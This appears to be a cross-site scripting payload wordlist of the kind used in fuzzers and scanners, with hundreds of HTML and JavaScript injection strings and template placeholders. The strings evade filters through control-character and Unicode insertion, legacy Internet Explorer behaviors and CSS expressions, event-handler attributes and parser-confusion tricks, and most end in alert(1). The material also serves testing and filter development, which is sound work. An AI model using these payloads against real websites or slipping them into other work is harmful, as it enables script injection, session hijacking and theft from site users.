+1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X 